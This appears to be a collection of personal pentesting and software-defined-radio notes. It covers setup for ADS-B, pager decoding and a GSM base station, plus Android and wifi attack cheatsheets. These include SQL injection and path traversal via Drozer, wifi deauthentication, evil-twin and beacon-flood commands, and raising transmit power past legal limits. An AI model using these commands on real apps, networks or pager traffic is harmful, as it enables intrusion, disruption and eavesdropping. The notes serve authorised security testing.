Installing dump1090 ADSB Decoder Tool on Ubuntu (16.04 LTS)

Installing dump1090 for the RTLSDR dongle

Download dump1090
Download dump1090 zip file from github:
https://github.com/antirez/dump1090

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev

Install dump1090
$ cd dump1090-master
$ make

Using dump1090
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the planes plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/dump1090-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Installing dump1090 fork for more device support (RTLSDR/HackRF/Airspy/SDRplay)

Download dump1090_sdrplus
Download dump1090_sdrplus zip file from github:
https://github.com/itemir/dump1090_sdrplus

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev
$ sudo apt-get install libhackrf0 libhackrf-dev
$ sudo apt-get install libairspy0 libairspy-dev
$ sudo apt-get install libsoxr0 libsoxr-dev

Next, download SDRPlay libraries from:
http://www.sdrplay.com/linuxdl.php

Install SDRPlay:
user@host:~$ chmod 755 SDRplay_RSP_MiricsAPI-1.9.4.run
user@host:~$ ./SDRplay_RSP_MiricsAPI-1.9.4.run
Verifying archive integrity… All good.
Uncompressing SDRplay Mirics API Install Package V1.9.4 100%
Installing SDRplay RSP Mirics API library…
Architecture: x86_64
API Version: 1.8.1
Remove old libraries…
[sudo] password for user:
Install /usr/local/lib/libmirsdrapi-rsp.so
Remove old header files…
Install /usr/local/include/mirsdrapi-rsp.h
Udev rules directory found, adding rules…
Libusb found, continuing…
Installing SoapySDRPlay…
Installing SoapySDR…
Finished.
$ sudo ldconfig

Install dump1090_sdrplus
$ cd dump1090_sdrplus-master
$ make

Using dump1090_sdrplus
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the plans plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libhackrf0 & libhackrf-dev installed fixes this error:

user@host:~/tools/dump1090_sdrplus-master$ make
Package libhackrf was not found in the pkg-config search path.
Perhaps you should add the directory containing `libhackrf.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libhackrf’ found
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:51:30: fatal error: libhackrf/hackrf.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libairspy0 & libairspy-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:52:30: fatal error: libairspy/airspy.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libsoxr0 & libsoxr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having SDRPlay libraries installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
cc -O2 -g -Wall -W -I/usr/include/ -I/usr/include/libusb-1.0 -I/usr/include/ -I/usr/include/libusb-1.0 -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: running ldconfig fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
./dump1090: error while loading shared libraries: libmirsdrapi-rsp.so: cannot open shared object file: No such file or directory

Installing multimon-ng Pager Decoder Tool on Ubuntu (16.04 LTS)

Download multimon-ng
Download multimon-ng zip file from github:
https://github.com/EliasOenal/multimon-ng

Note: Ubuntu has a “multimon” tool in the apt repos but using the github version here.
There are many ways to pipe the data into “multimon-ng”, but will use the pulse audio method here.

Install Prerequisites
$ sudo apt-get install pavucontrol
$ sudo apt-get install libpulse-dev

Install multimon-ng
$ cd multimon-ng-master
$ mkdir build
$ cd build
$ qmake ../multimon-ng.pro
$ make
$ sudo make install

Using multimon-ng with pulseaudio
1. Start gqrx
$ gqrx
Use gqrx to tune to a pager frequency (e.g. 148Mhz region for Australia)
Set the filter width to: “Wide”
Set the filter shape to: “Normal”
Set the gqrx mode to “Narrow FM”

3. Configure pavucontrol
$ pavucontrol
Set configuration tab: “Analogue Stereo Output”

3. Use pulseaudio to pipe the audio from gqrx to multimon-ng
$ padsp multimon-ng -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha

Note: set the pager demod options for your region
e.g. POCSAG for Australia

As you tune to different pager frequencies in gqrx, you will see the decoded messages appear in the multimon-ng terminal.

Fixing Install Errors
Note: having libpulse-dev installed fixes this error:

user@host:~/multimon-ng-master/build$ make
gcc -c -m64 -pipe -std=gnu99 -g -O2 -Wall -W -fPIC -DMAX_VERBOSE_LEVEL=3 -DPULSE_AUDIO -DCHARSET_UTF8 -I../../multimon-ng-master -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-g++-64 -o unixinput.o ../unixinput.c
../unixinput.c:45:26: fatal error: pulse/simple.h: No such file or directory
compilation terminated.
Makefile:391: recipe for target ‘unixinput.o’ failed
make: *** [unixinput.o] Error 1

Android Pentesting Command Cheatsheet

Useful tools
Android SDK
Android Studio
GenyMotion emulator
BusyBox
apktool
dex2jar
enjarify
jd-gui
MWR’s Drozer testing framework
Fino

Useful Linux file paths
android/adt-bundle-linux-ver-number/sdk/platform-tools: adb tool
android/adt-bundle-linux-ver-number/sdk/tools: emulator, android tools
~/.android/avd/<emulator-device-name>.avd/: emulator config files

Useful Windows file paths
C:\Users\username\AppData\Local\Android\sdk

Useful Android paths
/data/app: location of app on android device
/data/data/[packagename]/*: app data files
/data/Dalvik-cache: Classes.dex for all installed apps

Useful configuration settings
Enable hardware keyboard in emulator:
Add: hw.keyboard=yes to the config file:
~/.android/avd/<emulator-device-name>.avd/config.ini

Install test environment
Install Android SDR only
https://developer.android.com/studio/releases/platforms.html
OR
Install Android Studio
https://developer.android.com
OR
Install GenyMotion
https://www.genymotion.com

Install APIs
$ android
and choose API version to install with gui

List available Android targets
$ android list targets

Create an Android image for a target
$ android create avd -n test -t 3
$ android create avd -n test -t 3 –abi default/x86

Start emulator
Start the emulator for the created image @test:
emulator @test
$ adb shell

Install BusyBox
$ adb push busybox /data/local
$ adb shell
$ su
# mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
# mkdir /system/xbin
# cat /data/local/busybox > /system/xbin/busybox
# chmod 755 /system/xbin/busybox
# busybox --install /system/xbin
# mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
# sync
# reboot

Install Burp cert on emulator
Create an sdcard for the emulator:
$ mksdcard -l pisd 1G /tmp/sdcard

Launch emulator with -sdcard option:
$ emulator-x86 -sdcard /tmp/sdcard -avd test -qemu -m 1024 -enable-kvm -http-proxy "http://192.168.1.2:8080"

Get Portswigger cert from visiting a page in browser, export and save as Portswigger.crt
Note: must have .crt extension for android to recognise it on sdcard

Copy the cert onto the device:
$ adb push Portswigger.crt /mnt/sdcard
Next, go to “Settings” and install from sdcard

Installing Drozer
Install drozer app on test device and run it.
From your laptop, connect to the app:
$ adb forward tcp:31415 tcp:31415
$ drozer console connect
$ drozer console --server 10.0.2.15:31415 connect

Copy an APK off device
Installed APKs are located in /data/app on the device
$ adb pull /data/app/AppName-1.apk .

Extracting Java code from an APK
Extract the APK using APKTool. Run: apktool d AppName.apk
Extract the classes.dex file found in the APK file. Run: jar xvf classes.dex
Extract the classes from classes.dex file. Run: dex2jar classes.dex
Extract the classes.dex.dex2jar.jar. Run: jar xvf classes.dex.dex2jar.jar
Browse Java code: Open the extracted jar file in jd-gui

Check the manifest file
First, unpack the apk using unzip
$ unzip AppName.apk
$ axmlprinter AndroidManifest.xml

Check package information
Using Drozer:
dz> run app.package.list
dz> run app.package.attacksurface com.targetpackage
dz> run app.provider.info -a com.targetpackage

Check for the debug flag
Using Drozer:
dz> run app.package.debuggable
OR
Check manifest file.

Check for SQL injection
Using Drozer:
dz> run scanner.provider.injection -a com.targetpackage

Check for path traversal
Using Drozer:
dz> run scanner.provider.traversal -a com.targetpackage

Check the Content Providers
Content providers provide access to structured data.
Can be affected by: SQLi, directory traversal

Useful Drozer commands for working with content providers:
dz> run app.provider.info -a com.targetpackage
dz> run app.provider.finduri com.targetpackage
dz> run scanner.provider.finduris -a com.targetpackage
dz> run scanner.provider.traversal -a com.targetpackage
dz> run scanner.provider.injection -a com.targetpackage
dz> run app.provider.query content://com.targetpackage...
dz> run app.provider.query content://com.targetpackage... --vertical --selection "'"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM Key;--"
dz> run app.provider.read content://com.targetpackage...
dz> run app.provider.read content://com.targetpackage../etc/hosts
dz> run app.provider.download content://com.targetpackage../data/data/com.targetpackage]/databases/database.db

Check the Activities
Activities provide user facing components.
Can be affected by UI redressing attacks e.g. tap jacking etc

Useful Drozer commands for working with activities:
dz> run app.activity.info -a com.targetpackage
dz> run app.activity.start --component com.targetpackage com.targetpackage.ActivityName

Check the Services
Useful Drozer commands for working with services:
dz> run app.service.info -a com.targetpackage
dz> run app.service.send com.targetpackage com.targetpackage.ServiceName

Check the Intents
Intents can be implicit or explicit.
Check Manifest file for public intents, e.g.
<receiver android:name="my.special.receiver">
<intent-filter>
<action android:name="my.intent.action" />
</intent-filter>
</receiver>

Instead, intents should use the exported flag or made private e.g.
<receiver android:name="my.special.receiver"
android:exported=false>
...
</receiver>

OR
<receiver android:name="my.special.receiver"
android:exported=false>
android:permission="my.own.permission"
...
</receiver>

Check the Broadcast Receivers
Broadcast receivers handle implicit intent messages or system wide events

Useful Drozer commands for working with broadcast receivers:
dz> run app.broadcast.info -a com.PackageName.AppName
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName com.PackageName.AppName.push.GCMPushReceiver
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName.push.GCMPushReceiver --extra string paramName paramValue --extra sting paramName2 paramValue2

Check for Sticky broadcasts
<uses-permission android:name="android.permission.BROADCAST_STICKY"/>

Check the files stored on the device
Grep for:
http, https, ://, user, pass, hmac, login

Check for insecure data storage on the device
Perform a search for files relating to package name:
root@android:/ # find / -name com.PackageName -print

Check the SD Card:
/mnt/sdcard
/mnt/sdcard/Android/data/com.PackageName

Check the data directory:
/data/data/com.PackageName

Check the database files on the device:
sqlite> select * from StoredProperties;
429482317|OPEN_SESAME|pTpkKAqfa9ly2oLqmivPIMKZDhTVlPOMLC9Ogi3c8Z0fkXL+H8u66ytJ0aFh+QY4N4rX9Iq5qVuKnCon0a+lirekLJD3/6uoh/e5vaNptxI=

Save the database files off the device:
/data/data/packagename
cp name.db /mnt/sdcard
$ adb pull /mnt/sdcard/name.db . (otherwise won’t have perms to copy)

Check the log files:
logcat -b events
/data/anr
/data/dontpanic
/data/tombstones
dmesg

Check the device memory
Check memory stats:
$ adb shell dumpsys meminfo > mem.txt
$ adb shell dumpsys meminfo 'com.PackageName'

Dump the memory:
$ adb shell dumpsys > mem.txt
$ adb shell dumpstate > mem.txt (can show params passed to intents etc.)

Checking memory and logcat together:
$ adb shell bugreport > bugreport.txt

Check for bad code patterns
http://domain.com/api/save.php?t=" + paramString1 + "&u=" + paramString2);
reflection
etc.

Check for WebViews
Search the decompiled folder for:

addJavascriptInterface
grep -r -n -i --include=*.java addJavascriptInterface *
grep -r -i --include=*.java \@JavascriptInterface *

shouldOverrideUrlLoading
grep -r -n -i --include=*.java shouldOverrideUrlLoading *

Use Drozer module:
run ex.scanner.jsifenum -a com.targetpackage

Check the transport security
Use the emulator to dump traffic to a pcap flle with the option:
-tcpdump

Use the emulator to proxy traffic with the option:
-http-proxy

Intercept with burp.

Wifi Pentesting Command Cheatsheet

Find out which modes your card supports
airmon-ng (find phy#)
iw phy phy1 info | grep -A8 modes (grep 8 lines past “modes”)

Setting a MAC Address
ifconfig wlan3 down
ifconfig wlan3 hw ether c0:ff:ee:c0:ff:ee
ifconfig wlan3 up
OR
macchanger -r wlan3 (provides a random address every time)

Monitor Mode
ifconfig wlan3 up
airmon-ng start wlan3

Looking for SSIDs
dev wlan3 scan passive | grep SSID

Looking at client traffic to an AP
wireshark filter: wlan.addr==CC:00:FF:EE:EE:EE and not wlan.fc.subtype == 0x08 (MAC of AP & filter out beacon frames)
wlan.addr ==CC:00:FF:EE:EE:EE and wlan.addr == DD:EE:AA:DD:BE:EF (filter on 2 client MAC addresses)

Looking for vendors
airodump-ng --manufacturer (newer versions of airodump support this)

Setting the Channel
ifconfig wlan3 down
iwconfig wlan3 channel 1 (get channel id of ssid from airodump)
iwconfig mon0 channel 1
then verify the “Frequency” value in iwconfig e.g. channel 1 = 2.412 GHz

Connecting to an Open AP
iwconfig wlan3 channel 1
iwconfig wlan3 mode managed
iwconfig wlan3 essid APName

De-authentication
iwconfig mon0 channel 1
aireplay-ng -0 10 -a CC:00:FF:EE:EE:EE -cDD:EE:AA:DD:BE:EF mon0
deauth -a access point -c client
OR
broadcast deauth packets on behalf of ESSID 11:22:33:44:5 to deauth all clients
iwconfig mon0 channel 1
aireplay-ng --deauth 0 -a 11:22:33:44:55 mon0
OR
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules

Setting up an AP
bring up AP with same name as target (put on same channel as AP)
iwconfig wlan0 channel 1
iwconfig mon0 channel 1

use same BSSID as target AP & create AP on channel 1 (unless have 2 alfa cards, 1 for deauth and 1 for AP, need to use same channel as AP)
airbase-ng -a 11:22:33:44:55:66 -e APName mon0

setup deauth attack at same time
aireplay-ng --deuath 0 -a 00:11:22:33:44:55:66 mon0

Auditing EAP/PEAP Entreprise
crEAP
EAPeak

requires scapy-com:
apt-get remote python-scapy
hg clone https://bitbucket.org/secdev/scapy-com
cd scapy-com && python setup.py install

Using crEAP
python crEAP.py

Using EAPeak
eapeak -i wlan3 -s APName -l

Flooding beacon frames with fake ssid
mdk3 mon0 b -n newSSIDname

where:
b=beaconflood, -n=ssid name
floods all the channels with new SSID name

Increasing power of wifi card
e.g. for broadcasting beacons from outside, set to 1W (30dbm)
iw reg set BO
iwconfig wlan0 txpower 30
OR
ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30

Tools for visualising
Airgraph

Useful subtype hex values
0x04 : requests
0x05 : responses
0x08 : beacon frame

Units
txpower is in dBm
dBm to Watt conversions

dBm Watts dBm Watts dBm Watts
0 1.0 mW 16 40 mW 32 1.6 W
1 1.3 mW 17 50 mW 33 2.0 W
2 1.6 mW 18 63 mW 34 2.5 W
3 2.0 mW 19 79 mW 35 3.2 W
4 2.5 mW 20 100 mW 36 4.0 W
5 3.2 mW 21 126 mW 37 5.0 W
6 4 mW 22 158 mW 38 6.3 W
7 5 mW 23 200 mW 39 8.0 W
8 6 mW 24 250 mW 40 10 W
9 8 mW 25 316 mW 41 13 W
10 10 mW 26 398 mW 42 16 W
11 13 mW 27 500 mW 43 20 W
12 16 mW 28 630 mW 44 25 W
13 20 mW 29 800 mW 45 32 W
14 25 mW 30 1.0 W 46 40 W
15 32 mW 31 1.3 W 47 50 W

ref: http://www.cpcstech.com/dbm-to-watt-conversion-information.htm

Privilege Escalation References

Linux Priv Esc
http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-environments/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/pentestmonkey/unix-privesc-check
http://www.dankalia.com/tutor/01005/0100501004.htm
http://www.softpanorama.org/Tools/Find/finding_world_writable_abandoned_and_other_abnormal_files.shtml
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

Windows Priv Esc
https://www.insomniasec.com/downloads/publications/WindowsPrivEsc.ppt
http://toshellandback.com/2015/11/24/ms-priv-esc/
http://www.toshellandback.com/2015/08/30/gpp/
http://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
http://www.fuzzysecurity.com/tutorials/16.html

Installing YateBTS on a Clean Ubuntu Install (16.04 LTS)

Install Prerequisites
$ sudo apt-get install subversion
$ sudo apt-get install autoconf
$ sudo apt-get install libgsm1-dev
$ sudo apt-get install libgusb-dev
$ mkdir ~/tools

Install Yate
$ which -a yate-config (make sure only have 1 instance installed)
$ cd ~/tools
$ svn checkout http://voip.null.ro/svn/yate/trunk yate
$ cd yate
$ ./autogen.shr
$ ./configure
$ sudo make install-noapi

Install YateBTS
$ cd ~/tools
$ svn checkout http://voip.null.ro/svn/yatebts/trunk yatebts
$ cd yatebts
$ ./autogen.sh
$ ./configure
$ sudo make install

Configure your username permissions for running YateBTS
$ sudo addgroup yate
$ sudo usermod -G yate [your-username]
$ sudo touch /usr/local/etc/yate/snmp_data.conf /usr/local/etc/yate/tmsidata.conf
$ sudo chown root:yate /usr/local/etc/yate/*.conf
$ sudo chmod g+w /usr/local/etc/yate/*.conf

Configure YateBTS values
$ sudo vim /usr/local/etc/yate/ybts.conf
Radio.Band= 900 (set your countries value here)
Radio.C0=0 (determined by your band)
Identity.MCC=001 (uncomment)

$ sudo vim /etc/security/limits.conf (increase yate’s priority value, append these lines)
@yate hard nice -20
@yate hard rtprio 99

$ sudo vim /usr/local/etc/yate/ybts.conf
radio_read_priority=highest (uncomment and change to highest)
radio_send_priority=high (uncomment and change to high)

$ sudo vim /usr/local/etc/yate/ysnmpagent.conf (change SNMP port numbers so normal users can use them)
port=20161 (uncomment and change value)
remote_port=20162 (uncomment and change value)

$ sudo vim /usr/local/etc/yate/subscribers.conf (set country code)
country_code=61 (e.g. for Australia)

Start and test YateBTS
$ yate
$ telnet localhost 5038
nib list registered (list registered devices)
nib list rejected (list rejected devices)

  • Try and connect to the “101” 2G network on your two test devices
  • Take your two test IMSI numbers from nib list rejected and add regexp= to /usr/local/etc/yate/subscribers.conf
  • Now you can make calls to each other with your allocated phone numbers (you will recieve an sms when you join the network) or text ELIZA questions on 35492

Installing a BladeRF on a Clean Ubuntu Install (16.04 LTS)

Installing a BladeRF
$ sudo add-apt-repository ppa:bladerf/bladerf
$ sudo apt-get update (you may get some 404s but it’s ok)
$ sudo apt-get install bladerf
$ sudo apt-get install libbladerf-dev
$ sudo apt-get install bladerf-firmware-fx3
$ sudo apt-get install bladerf-fpga-hostedx40 (for the 40 kLE hardware)
OR 
$ sudo apt-get install bladerf-fpga-hostedx115 (for the 115 kLE hardware)

Plug in the BladeRF
$ bladeRF-cli --flash-firmware /usr/share/Nuand/bladeRF/bladeRF_fw.img

Plug out the BladeRF and plug back in again
$ bladeRF-cli -p
Backend: libusb
Serial: d6cbcb056cc2aa1e37d14c41f15fe3af
USB Bus: 4
USB Address: 3

$ bladeRF-cli -i
bladeRF> version
bladeRF-cli version: 1.3.1-0.2016.01~rc1-3
libbladeRF version: 1.5.1-0.2016.01~rc1-3
Firmware version: 1.9.0
FPGA version: 0.5.0